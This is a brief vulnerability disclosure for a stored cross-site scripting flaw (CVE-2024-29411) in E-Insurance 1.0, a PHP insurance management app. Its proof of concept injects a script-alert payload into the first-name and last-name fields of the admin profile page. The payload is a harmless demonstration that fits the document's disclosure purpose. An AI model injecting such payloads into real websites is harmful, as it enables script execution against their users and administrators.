E-Insurance 1.0 Cross Site Scripting

E-Insurance 1.0 Cross Site Scripting
Posted Apr 2, 2024
Authored by Sandeep Vishwakarma

E-Insurance version 1.0 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2024-29411
SHA-256 | 2406f7a2a5b0e1d7a42e0a17b9b16051a07748a1a40df70eaddfa04ad1ec98fd
Download | Favorite | View
# Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)
# Google Dork: NA
# Date: 28-03-2024
# Exploit Author: Sandeep Vishwakarma
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html
# Version: v1.0
# Tested on: Windows 10
# Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE -
v1.0 allows an attacker to execute arbitrary code via a crafted payload to
the Firstname and lastname parameter in the profile component.
# POC:
1. After login goto http://127.0.0.1/E-Insurance/Script/admin/?page=profile
2. In fname & lname parameter add payolad
"><script>alert("Hacked_by_Sandy")</script>
3. click on submit.
# Reference:
https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md

نوشته های مشابه

CVE-2025-4511 – Vector4Wang Spring-Boot-Quick Remote Path Traversal Vulnerability

CVE-2025-4512 – Inetum IODAS Cross-Site Scripting Vulnerability

CVE-2025-4513 – Moodle Catalyst User Key Authentication Plugin Open Redirect Vulnerability

CVE-2025-4514 – Zhengzhou Jiuhua Electronic Technology mayicms SQL Injection Vulnerability